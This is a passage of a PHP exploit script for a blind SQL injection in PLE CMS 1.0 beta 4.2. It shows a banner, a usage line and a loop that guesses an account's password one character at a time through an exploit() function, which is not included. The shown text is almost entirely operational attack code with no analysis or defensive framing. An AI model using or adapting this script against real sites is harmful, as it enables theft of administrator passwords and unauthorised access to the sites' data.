--+++==============================================================+++-- --+++====== PLE CMS 1.0 beta 4.2 Blind SQL Injection Exploit ======+++-- --+++==============================================================+++-- ". "\n[+] Ex. : php xpl.php localhost /PLECMS root abcdefghijklmnopqrstuvwxyz0123456789". "\n\n"); } if ($argc < 4) usage (); $hostname = $argv [1]; $path = $argv [2]; $user = $argv [3]; $key = (empty ($argv [4])) ? "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" : $argv [4]; $chr = 0; $pos = 1; print "\n[+] Password: "; while ($chr < strlen ($key)) { if (exploit ($hostname, $path, $user, $pos, $key [$chr])) { echo $key [$chr]; $chr = 0; $pos++; } else $chr++; } print "\n\n";